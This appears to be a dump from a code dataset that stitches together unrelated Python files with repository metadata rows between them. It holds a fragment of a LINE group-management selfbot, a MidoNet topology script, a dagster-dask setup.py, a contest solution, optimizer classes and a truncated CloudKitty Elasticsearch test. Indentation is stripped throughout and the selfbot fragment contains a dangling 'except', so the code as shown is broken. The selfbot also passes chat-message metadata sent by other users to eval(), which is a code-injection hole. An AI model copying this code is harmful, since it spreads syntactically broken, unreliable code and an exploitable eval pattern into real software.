wait2["addowner"] = False
cl.sendMessage(msg.to, "Add owner was off")
else:
cl.sendMessage(msg.to, "Was off")
elif msg.text in [".del owner on"]:
if msg._from in creator:
if wait2["delowner"] == False:
wait2["delowner"] = True
cl.sendMessage(msg.to, "Please send Contact for Removed")
else:
cl.sendMessage(msg.to, "Was on,, Please send Contact for.Removed")
elif msg.text in [".del owner off"]:
if msg._from in creator:
if wait2["delowner"] == True:
wait2["delowner"] = False
cl.sendMessage(msg.to, "Removed owner was off")
else:
cl.sendMessage(msg.to, "Was off")
elif msg.text in [".clear owner"]:
if msg._from in creator:
org["owner"] = {}
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes clear")
elif msg.text == self.resp + "owner":
if msg._from in creator:
if org["owner"] == {}:
cl.sendMessage(msg.to,"empty Tlist")
else:
mc = []
for mi_d in org["owner"]:
mc.append(mi_d)
pass
cban = cl.getContacts(mc)
nban = []
for x in range(len(cban)):
nban.append(cban[x].displayName)
pass
jo = "\n_ ".join(str(i) for i in nban)
cl.sendMessage(msg.to,"_====[ Owner List ]====_\n\n_ %s\n\n_====[ Total: %s ]====_"%(jo,str(len(cban))))
elif msg.text == self.resp + "admin":
if msg._from in creator:
if org["admin"] == {}:
cl.sendMessage(msg.to,"empty Tlist")
else:
mc = []
for mi_d in org["admin"]:
mc.append(mi_d)
pass
cban = cl.getContacts(mc)
nban = []
for x in range(len(cban)):
nban.append(cban[x].displayName)
pass
jo = "\n_ ".join(str(i) for i in nban)
cl.sendMessage(msg.to,"_====[ Admin List ]====_\n\n_ %s\n\n_====[ Total: %s ]====_"%(jo,str(len(cban))))
elif msg.text == self.resp + "staff":
if msg._from in creator:
if org["staff"] == {}:
cl.sendMessage(msg.to,"empty Tlist")
else:
mc = []
for mi_d in org["staff"]:
mc.append(mi_d)
pass
cban = cl.getContacts(mc)
nban = []
for x in range(len(cban)):
nban.append(cban[x].displayName)
pass
jo = "\n_ ".join(str(i) for i in nban)
cl.sendMessage(msg.to,"_====[ Staff List ]====_\n\n_ %s\n\n_====[ Total: %s ]====_"%(jo,str(len(cban))))
elif msg.text in [".add admin"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["addadmin"]=True
cl.sendMessage(msg.to, "send contact")
elif msg.text in [".del admin"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["deladmin"]=True
cl.sendMessage(msg.to, "send contact")
elif msg.text in [".clear admin"]:
if msg._from in creator or msg._from in org["owner"]:
org["admin"] = {}
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes clear")
elif msg.text in [".add staff"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
wait2["addstaff"]=True
cl.sendMessage(msg.to, "send contact")
elif msg.text in [".del staff"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
wait2["delstaff"]=True
cl.sendMessage(msg.to, "send contact")
elif msg.text in [".clear staff"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
org["staff"] = {}
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes clear")
elif msg.text in [".autojoin on"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoin"]=True
cl.sendMessage(msg.to,"Auto join in Activated")
elif msg.text in [".autojoin off"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoin"]=False
cl.sendMessage(msg.to,"Auto join not Active")
elif msg.text in [".cban"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
wait2['blacklist'] = {}
with open('wait2.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendMessage(to,"°done boss")
elif msg.text in [".addban"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
wait2["ablacklist"]=True
cl.sendMessage(to, "please send contact")
elif msg.text in [".delban"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
wait2["dblacklist"]=True
cl.sendMessage(to, "please send contact")
elif msg.text == self.resp + "banlist":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["blacklist"] == {}:
cl.sendMessage(to,"empty list")
else:
mc = "_====[ BLACKLIST ]====_\n"
for mi_d in wait2["blacklist"]:
mc += "\n_ "+cl.getContact(mi_d).displayName
cl.sendMessage(msg.to,mc + "\n_====[ BLACKLIST ]====_")
elif msg.text in [".sp"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
start = time.time()
cl.sendMessage("u9d79f5031bc4c73a5054aa8b26c9d0c2", '.')
elapsed_time = time.time() - start
cl.sendMessage(msg.to, "%s second" % (elapsed_time))
elif msg.text in [".protect on"]:
if msg._from in creator or msg._from in org["owner"]:
pro["Proqr"][msg.to] = True
pro["Procancel"][msg.to] = True
pro["Proinvite"][msg.to] = True
pro["Autokick"][msg.to] = True
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"High All Protection On")
elif msg.text in [".protect off"]:
if msg._from in creator or msg._from in org["owner"]:
if msg.to in pro["Proqr"]:
try:
del pro["Proqr"][msg.to]
except:
pass
if msg.to in pro["Procancel"]:
try:
del pro["Procancel"][msg.to]
except:
pass
if msg.to in pro["Proinvite"]:
try:
del pro["Proinvite"][msg.to]
except:
pass
if msg.to in pro["Autokick"]:
try:
del pro["Autokick"][msg.to]
except:
pass
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"All Protection Off")
elif msg.text == self.resp + "grup set":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
md = ""
if msg.to in pro["Proqr"]: md+="_Protect grup : on_\n"
else: md +="_Protect grup : off_\n"
if msg.to in pro["Procancel"]: md+="_Protect cancel : on_\n"
else: md+= "_Protect cancel : off_\n"
if msg.to in pro["Proinvite"]: md+="_Protect invite : on_\n"
else: md+= "_Protect invite : off_\n"
if msg.to in pro["Autokick"]: md+="_Auto kick : on_\n"
else:md+="_Auto kick : off_\n"
if msg.to in pro["Proname"]: md+="_Protection Group Name : on_\n"
else: md+= "_Protection Group Name : off_\n"
cl.sendMessage(msg.to,"_========[ Grup set up ]========_\n\n"+ md +"_========[ Znf Bots ]========_")
elif self.resp + "gn" in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("gn","")
cl.updateGroup(X)
elif msg.text in ["Lockname on"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if msg.to in pro["Lockname"]:
cl.sendMessage(msg.to,"Name Group in Locked")
else:
pro["Lockname"][msg.to] = True
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
pro["gname"][msg.to] = cl.getGroup(msg.to).name
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes Locked Group Name")
elif msg.text in ["Lockname off"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if msg.to not in pro["Lockname"]:
cl.sendMessage(msg.to,"Name Group not in Locked")
else:
del pro["Lockname"][msg.to]
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
del pro["gname"][msg.to]
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes open Locked Group Name")
elif msg.text == self.resp +"mention":
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
k = len(nama)//20
for a in range(k+1):
txt = u''
s=0
b=[]
for i in group.members[a*20 : (a+1)*20]:
b.append({"S":str(s), "E" :str(s+6), "M":i.mid})
s += 7
txt += u'@Alin \n'
cl.sendMessage(to, text=txt, contentMetadata={u'MENTION': json.dumps({'MENTIONEES':b})}, contentType=0)
elif (".owner add" in msg.text):
if msg._from in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in org["owner"]:
cl.sendMessage(msg.to,"Was owner..")
else:
try:
org["owner"][target] = True
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes add owner")
except:
pass
elif ".owner del " in msg.text:
if msg._from in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in org["owner"]:
cl.sendMessage(msg.to,"not in owner..")
else:
try:
del org["owner"][target]
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes remove owner")
except:
pass
elif ".admin add " in msg.text:
if msg._from in creator or msg._from in org["owner"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in org["admin"]:
cl.sendMessage(msg.to,"was admin")
else:
try:
org["admin"][target] = True
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes remove admin")
except:
pass
elif ".admin del " in msg.text:
if msg._from in creator or msg._from in org["owner"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in org["admin"]:
cl.sendMessage(msg.to,"not in admin")
else:
try:
del org["admin"][target]
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes remove admin")
except:
pass
elif ".staff add " in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in org["staff"]:
cl.sendMessage(msg.to,"was staff")
else:
try:
org["staff"][target] = True
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes add staff")
except:
pass
elif ".staff del " in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in org["staff"]:
cl.sendMessage(msg.to,"not in staff")
else:
try:
del org["staff"][target]
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes remove staff")
except:
pass
elif msg.text in [".rechat"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
try:
cl.removeAllMessages(op.param2)
cl.sendMessage(to,"done")
except:
pass
elif msg.text in [".add on"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["message"]=True
cl.sendMessage(to,"autoAdd on")
elif msg.text in [".add off"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["message"]=False
cl.sendMessage(to,"autoAdd off")
elif msg.text in [".ticket on"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoinTicket"]=True
cl.sendMessage(to,"autoJoinTicket on")
elif msg.text in [".ticket off"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoinTicket"]=False
cl.sendMessage(to,"autoJoinTicket off")
elif "/ti/g/" in msg.text.lower():
if msg._from in creator or msg._from in org["owner"]:
if wait2["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
except:
e = traceback.format()
with open("e","a") as error:error.write("\n{}".format(e))
| 54.345164
| 182
| 0.401048
|
a1b4029c62a29255d2ffeb829655268b5b2b2d36
| 2,982
|
py
|
Python
|
tests/mmm/topology/topology-l2gw.py
|
duarten/midonet
|
c7a5aa352a8038bdc6a463c68abc47bb411a1e7c
|
[
"Apache-2.0"
] | 1
|
2015-05-19T08:36:55.000Z
|
2015-05-19T08:36:55.000Z
|
tests/mmm/topology/topology-l2gw.py
|
duarten/midonet
|
c7a5aa352a8038bdc6a463c68abc47bb411a1e7c
|
[
"Apache-2.0"
] | null | null | null |
tests/mmm/topology/topology-l2gw.py
|
duarten/midonet
|
c7a5aa352a8038bdc6a463c68abc47bb411a1e7c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Midokura SARL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from midonetclient.api import MidonetApi
from topology.bridge import Bridge
from topology.host_interface import HostInterface
from topology.tenants import get_tenant
from topology.tunnel_zone import TunnelZone
from topology.tunnel_zone_host import TunnelZoneHost
from topology.transaction import Transaction
from topology.utils import midonet_read_host_uuid
import sys
import traceback
if __name__ == '__main__':
providerName = 'midonet_provider'
tenantNames = ['tenant0', 'tenant1']
provider = get_tenant(providerName)
if not provider:
print "provider %r not found", providerName
sys.exit(1)
providerId = provider.id
tenants = map(get_tenant,tenantNames)
if not all(tenants):
print "not all tenants are found"
sys.exit(1)
tenantIds = map(lambda tenant: tenant.id,tenants)
hosts = ['00000000-0000-0000-0000-000000000001',
'00000000-0000-0000-0000-000000000002',
'00000000-0000-0000-0000-000000000003']
addresses = ['10.0.0.8','10.0.0.9','10.0.0.10']
if not all(hosts):
print "host uuid file(s) is not found"
sys.exit(1)
api = MidonetApi('http://127.0.0.1:8080/midonet-api','admin','*')
tx = Transaction()
try:
zone = TunnelZone({'name': 'zone0', 'type': 'gre'})
zone.add(api,tx,map(lambda h,a:
TunnelZoneHost({'hostId': h,'ipAddress': a}),
hosts,addresses))
bridge1 = Bridge({'name':'bridge1','tenantId':tenantIds[0],'vlanId':"1"})
bridge1.add(api,tx,[HostInterface({'hostId': hosts[0],'name':'veth0'}),
HostInterface({'hostId': hosts[1],'name':'veth0'})])
bridge2 = Bridge({'name':'bridge2','tenantId':tenantIds[1],'vlanId':"2"})
bridge2.add(api,tx,[HostInterface({'hostId': hosts[1],'name':'veth1'}),
HostInterface({'hostId': hosts[1],'name':'veth2'})])
trunk_bridge = Bridge({'name':'bridge0','tenantId':providerId})
trunk_bridge.add(api,tx,
[HostInterface({'hostId': hosts[0],'name':'eth2'}),
HostInterface({'hostId': hosts[1],'name':'eth2'}),
bridge1,
bridge2])
except:
traceback.print_exc()
tx.rollback()
# import pdb; pdb.set_trace()
# tx.rollback()
| 39.76
| 81
| 0.632126
|
ff179388bda1ba9636cf07d7367ec22b077dcc6e
| 1,317
|
py
|
Python
|
python_modules/libraries/dagster-dask/setup.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
python_modules/libraries/dagster-dask/setup.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
python_modules/libraries/dagster-dask/setup.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import find_packages, setup
def get_version():
version = {}
with open('dagster_dask/version.py') as fp:
exec(fp.read(), version) # pylint: disable=W0122
return version['__version__']
if __name__ == '__main__':
setup(
name='dagster-dask',
version=get_version(),
author='Elementl',
author_email='hello@elementl.com',
license='Apache-2.0',
description='Package for using Dask as Dagster\'s execution engine.',
url='https://github.com/dagster-io/dagster/tree/master/python_modules/libraries/dagster-dask',
classifiers=[
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
],
packages=find_packages(exclude=['test']),
install_requires=[
'bokeh',
'dagster',
'dagster_graphql',
'dask>=1.2.2',
'distributed>=1.28.1',
],
extras_require={
'yarn': ['dask-yarn'],
'pbs': ['dask-jobqueue'],
'kube': ['dask-kubernetes'],
},
zip_safe=False,
)
| 30.627907
| 102
| 0.549734
|
19e913d0b17babfa1ed8ae8077b692c2f216a11e
| 183
|
py
|
Python
|
atcoder/abc059/b.py
|
Ashindustry007/competitive-programming
|
2eabd3975c029d235abb7854569593d334acae2f
|
[
"WTFPL"
] | 506
|
2018-08-22T10:30:38.000Z
|
2022-03-31T10:01:49.000Z
|
atcoder/abc059/b.py
|
Ashindustry007/competitive-programming
|
2eabd3975c029d235abb7854569593d334acae2f
|
[
"WTFPL"
] | 13
|
2019-08-07T18:31:18.000Z
|
2020-12-15T21:54:41.000Z
|
atcoder/abc059/b.py
|
Ashindustry007/competitive-programming
|
2eabd3975c029d235abb7854569593d334acae2f
|
[
"WTFPL"
] | 234
|
2018-08-06T17:11:41.000Z
|
2022-03-26T10:56:42.000Z
|
#!/usr/bin/env python3
# https://abc059.contest.atcoder.jp/tasks/abc059_b
a = int(input())
b = int(input())
if a == b: print('EQUAL')
elif a < b: print('LESS')
else: print('GREATER')
| 22.875
| 50
| 0.650273
|
fe4c5bf32ba08eb64a90f40b14f3cc571817c9d6
| 3,755
|
py
|
Python
|
chapter08/commons/optimizer.py
|
Myeonghan-Jeong/deep-learning-from-scratch
|
0df7f9f352920545f5309e8e11c7cf879ad477e5
|
[
"MIT"
] | null | null | null |
chapter08/commons/optimizer.py
|
Myeonghan-Jeong/deep-learning-from-scratch
|
0df7f9f352920545f5309e8e11c7cf879ad477e5
|
[
"MIT"
] | 3
|
2021-06-08T21:22:11.000Z
|
2021-09-08T01:55:11.000Z
|
chapter08/commons/optimizer.py
|
myeonghan-nim/deep-learning-from-scratch
|
fef3e327c49593b5df74728a1cba1144948a2999
|
[
"MIT"
] | null | null | null |
import numpy as np
class SGD:
def __init__(self, lr=0.01):
self.lr = lr
def update(self, params, grads):
for key in params.keys():
params[key] -= self.lr * grads[key]
class Momentum:
def __init__(self, lr=0.01, momentum=0.9):
self.lr = lr
self.momentum = momentum
self.v = None
def update(self, params, grads):
if self.v is None:
self.v = {}
for key, val in params.items():
self.v[key] = np.zeros_like(val)
for key in params.keys():
self.v[key] = self.momentum * self.v[key] - self.lr * grads[key]
params[key] += self.v[key]
class Nesterov:
# upgraded momentum, Nesterov's Accelerated Gradient: http://arxiv.org/abs/1212.0901, http://newsight.tistory.com/224
def __init__(self, lr=0.01, momentum=0.9):
self.lr = lr
self.momentum = momentum
self.v = None
def update(self, params, grads):
if self.v is None:
self.v = {}
for key, val in params.items():
self.v[key] = np.zeros_like(val)
for key in params.keys():
self.v[key] *= self.momentum
self.v[key] -= self.lr * grads[key]
params[key] += self.momentum * self.momentum * self.v[key]
params[key] -= (1 + self.momentum) * self.lr * grads[key]
class AdaGrad:
def __init__(self, lr=0.01):
self.lr = lr
self.h = None
def update(self, params, grads):
if self.h is None:
self.h = {}
for key, val in params.items():
self.h[key] = np.zeros_like(val)
for key in params.keys():
self.h[key] += grads[key] * grads[key]
params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)
class RMSprop:
def __init__(self, lr=0.01, decay_rate=0.99):
self.lr = lr
self.decay_rate = decay_rate
self.h = None
def update(self, params, grads):
if self.h is None:
self.h = {}
for key, val in params.items():
self.h[key] = np.zeros_like(val)
for key in params.keys():
self.h[key] *= self.decay_rate
self.h[key] += (1 - self.decay_rate) * grads[key] * grads[key]
params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)
class Adam: # Adam: http://arxiv.org/abs/1412.6980v8
def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):
self.lr = lr
self.beta1 = beta1
self.beta2 = beta2
self.iter = 0
self.m = None
self.v = None
def update(self, params, grads):
if self.m is None:
self.m, self.v = {}, {}
for key, val in params.items():
self.m[key] = np.zeros_like(val)
self.v[key] = np.zeros_like(val)
self.iter += 1
lr_t = self.lr * np.sqrt(1.0 - self.beta2 ** self.iter) / \
(1.0 - self.beta1 ** self.iter)
for key in params.keys():
# self.m[key] = self.beta1 * self.m[key] + (1 - self.beta1) * grads[key]
# self.v[key] = self.beta2 * self.v[key] + (1 - self.beta2) * (grads[key] ** 2)
self.m[key] += (1 - self.beta1) * (grads[key] - self.m[key])
self.v[key] += (1 - self.beta2) * (grads[key] ** 2 - self.v[key])
params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + 1e-7)
# unbias_m += (1 - self.beta1) * (grads[key] - self.m[key]) # correct bias
# unbisa_b += (1 - self.beta2) * (grads[key]*grads[key] - self.v[key]) # correct bias
# params[key] += self.lr * unbias_m / (np.sqrt(unbisa_b) + 1e-7)
| 32.37069
| 121
| 0.514514
|
c5ae2e7c2f58bb828c4f607981d72ceef3ac1833
| 852
|
py
|
Python
|
src/bots/requests_backend/utils.py
|
lbougan/whale-alert-telegram-bot
|
9216512e4fb3e2ad578ca607b9a581f9a62c0c17
|
[
"MIT"
] | 1
|
2021-12-10T11:27:37.000Z
|
2021-12-10T11:27:37.000Z
|
src/bots/requests_backend/utils.py
|
lbougan/whale-alert-telegram-bot
|
9216512e4fb3e2ad578ca607b9a581f9a62c0c17
|
[
"MIT"
] | null | null | null |
src/bots/requests_backend/utils.py
|
lbougan/whale-alert-telegram-bot
|
9216512e4fb3e2ad578ca607b9a581f9a62c0c17
|
[
"MIT"
] | 1
|
2022-01-16T09:33:39.000Z
|
2022-01-16T09:33:39.000Z
|
from typing import Dict, Union
from six.moves.urllib import parse as urlparse
def build_url(base_url: str, query_params: Dict[str, Union[str, int]]) -> str:
"""
Adds additional query parameters to the base_url
e.g. build_url('https://example.ch', {'q': 'demo'}) -> https://example.ch?q=demo.
It will also consider existing GET arguments.
:param base_url: url string
:param query_params: dict with additional arguments to be appended to the base_url
:return: url string
"""
assert isinstance(query_params, dict), "Dictionary is expected in `query_params` {}".format(
query_params
)
url_parts = list(urlparse.urlparse(base_url))
query = dict(urlparse.parse_qsl(url_parts[4]))
query.update(query_params)
url_parts[4] = urlparse.urlencode(query)
return urlparse.urlunparse(url_parts)
| 35.5
| 96
| 0.704225
|
b81d9bc767d2caac86adacc782af9a32d502f9da
| 19,618
|
py
|
Python
|
cloudkitty/tests/storage/v2/elasticsearch/test_client.py
|
stackhpc/cloudkitty
|
25149441fb9bf1a5d0b5dd6db81468ca14c2998a
|
[
"Apache-2.0"
] | null | null | null |
cloudkitty/tests/storage/v2/elasticsearch/test_client.py
|
stackhpc/cloudkitty
|
25149441fb9bf1a5d0b5dd6db81468ca14c2998a
|
[
"Apache-2.0"
] | 1
|
2022-01-20T16:35:22.000Z
|
2022-01-20T16:35:22.000Z
|
cloudkitty/tests/storage/v2/elasticsearch/test_client.py
|
stackhpc/cloudkitty
|
25149441fb9bf1a5d0b5dd6db81468ca14c2998a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import collections
import datetime
import unittest
from dateutil import tz
import mock
from cloudkitty import dataframe
from cloudkitty.storage.v2.elasticsearch import client
from cloudkitty.storage.v2.elasticsearch import exceptions
class TestElasticsearchClient(unittest.TestCase):
def setUp(self):
super(TestElasticsearchClient, self).setUp()
self.client = client.ElasticsearchClient(
'http://elasticsearch:9200',
'index_name',
'test_mapping',
autocommit=False)
def test_build_must_no_params(self):
self.assertEqual(self.client._build_must(None, None, None, None), [])
def test_build_must_with_start_end(self):
start = datetime.datetime(2019, 8, 30, tzinfo=tz.UTC)
end = datetime.datetime(2019, 8, 31, tzinfo=tz.UTC)
self.assertEqual(
self.client._build_must(start, end, None, None),
[{'range': {'start': {'gte': '2019-08-30T00:00:00+00:00'}}},
{'range': {'end': {'lte': '2019-08-31T00:00:00+00:00'}}}],
)
def test_build_must_with_filters(self):
filters = {'one': '1', 'two': '2', 'type': 'awesome'}
self.assertEqual(
self.client._build_must(None, None, None, filters),
[{'term': {'type': 'awesome'}}],
)
def test_build_must_with_metric_types(self):
types = ['awesome', 'amazing']
self.assertEqual(
self.client._build_must(None, None, types, None),
[{'terms': {'type': ['awesome', 'amazing']}}],
)
def test_build_should_no_filters(self):
self.assertEqual(
self.client._build_should(None),
[],
)
def test_build_should_with_filters(self):
filters = collections.OrderedDict([
('one', '1'), ('two', '2'), ('type', 'awesome')])
self.assertEqual(
self.client._build_should(filters),
[
{'term': {'groupby.one': '1'}},
{'term': {'metadata.one': '1'}},
{'term': {'groupby.two': '2'}},
{'term': {'metadata.two': '2'}},
],
)
def test_build_composite_no_groupby(self):
self.assertEqual(self.client._build_composite(None), [])
def test_build_composite(self):
self.assertEqual(
self.client._build_composite(['one', 'type', 'two']),
{'sources': [
{'one': {'terms': {'field': 'groupby.one'}}},
{'type': {'terms': {'field': 'type'}}},
{'two': {'terms': {'field': 'groupby.two'}}},
]},
)
def test_build_query_no_args(self):
self.assertEqual(self.client._build_query(None, None, None), {})
def test_build_query(self):
must = [{'range': {'start': {'gte': '2019-08-30T00:00:00+00:00'}}},
{'range': {'start': {'lt': '2019-08-31T00:00:00+00:00'}}}]
should = [
{'term': {'groupby.one': '1'}},
{'term': {'metadata.one': '1'}},
{'term': {'groupby.two': '2'}},
{'term': {'metadata.two': '2'}},
]
composite = {'sources': [
{'one': {'terms': {'field': 'groupby.one'}}},
{'type': {'terms': {'field': 'type'}}},
{'two': {'terms': {'field': 'groupby.two'}}},
]}
expected = {
'query': {
'bool': {
'must': must,
'should': should,
'minimum_should_match': 2,
},
},
'aggs': {
'sum_and_price': {
'composite': composite,
'aggregations': {
"sum_price": {"sum": {"field": "price"}},
"sum_qty": {"sum": {"field": "qty"}},
},
},
},
}
self.assertEqual(
self.client._build_query(must, should, composite), expected)
def test_log_query_no_hits(self):
url = '/endpoint'
body = {'1': 'one'}
response = {'took': 42}
expected = """Query on /endpoint with body "{'1': 'one'}" took 42ms"""
with mock.patch.object(client.LOG, 'debug') as debug_mock:
self.client._log_query(url, body, response)
debug_mock.assert_called_once_with(expected)
def test_log_query_with_hits(self):
url = '/endpoint'
body = {'1': 'one'}
response = {'took': 42, 'hits': {'total': 1337}}
expected = """Query on /endpoint with body "{'1': 'one'}" took 42ms"""
expected += " for 1337 hits"
with mock.patch.object(client.LOG, 'debug') as debug_mock:
self.client._log_query(url, body, response)
debug_mock.assert_called_once_with(expected)
def test_req_valid_status_code_no_deserialize(self):
resp_mock = mock.MagicMock()
resp_mock.status_code = 200
method_mock = mock.MagicMock()
method_mock.return_value = resp_mock
req_resp = self.client._req(
method_mock, None, None, None, deserialize=False)
method_mock.assert_called_once_with(None, data=None, params=None)
self.assertEqual(req_resp, resp_mock)
def test_req_valid_status_code_deserialize(self):
resp_mock = mock.MagicMock()
resp_mock.status_code = 200
resp_mock.json.return_value = 'output'
method_mock = mock.MagicMock()
method_mock.return_value = resp_mock
with mock.patch.object(self.client, '_log_query') as log_mock:
req_resp = self.client._req(
method_mock, None, None, None, deserialize=True)
method_mock.assert_called_once_with(None, data=None, params=None)
self.assertEqual(req_resp, 'output')
log_mock.assert_called_once_with(None, None, 'output')
def test_req_invalid_status_code(self):
resp_mock = mock.MagicMock()
resp_mock.status_code = 400
method_mock = mock.MagicMock()
method_mock.return_value = resp_mock
self.assertRaises(exceptions.InvalidStatusCode,
self.client._req,
method_mock, None, None, None)
def test_put_mapping(self):
mapping = {'a': 'b'}
with mock.patch.object(self.client, '_req') as rmock:
self.client.put_mapping(mapping)
rmock.assert_called_once_with(
self.client._sess.put,
'http://elasticsearch:9200/index_name/_mapping/test_mapping',
'{"a": "b"}', {'include_type_name': 'true'}, deserialize=False)
def test_get_index(self):
with mock.patch.object(self.client, '_req') as rmock:
self.client.get_index()
rmock.assert_called_once_with(
self.client._sess.get,
'http://elasticsearch:9200/index_name',
None, None, deserialize=False)
def test_search_without_scroll(self):
mapping = {'a': 'b'}
with mock.patch.object(self.client, '_req') as rmock:
self.client.search(mapping, scroll=False)
rmock.assert_called_once_with(
self.client._sess.get,
'http://elasticsearch:9200/index_name/_search',
'{"a": "b"}', None)
def test_search_with_scroll(self):
mapping = {'a': 'b'}
with mock.patch.object(self.client, '_req') as rmock:
self.client.search(mapping, scroll=True)
rmock.assert_called_once_with(
self.client._sess.get,
'http://elasticsearch:9200/index_name/_search',
'{"a": "b"}', {'scroll': '60s'})
def test_scroll(self):
body = {'a': 'b'}
with mock.patch.object(self.client, '_req') as rmock:
self.client.scroll(body)
rmock.assert_called_once_with(
self.client._sess.get,
'http://elasticsearch:9200/_search/scroll',
'{"a": "b"}', None)
def test_close_scroll(self):
body = {'a': 'b'}
with mock.patch.object(self.client, '_req') as rmock:
self.client.close_scroll(body)
rmock.assert_called_once_with(
self.client._sess.delete,
'http://elasticsearch:9200/_search/scroll',
'{"a": "b"}', None, deserialize=False)
def test_close_scrolls(self):
with mock.patch.object(self.client, 'close_scroll') as func_mock:
with mock.patch.object(self.client, '_scroll_ids',
new=['a', 'b', 'c']):
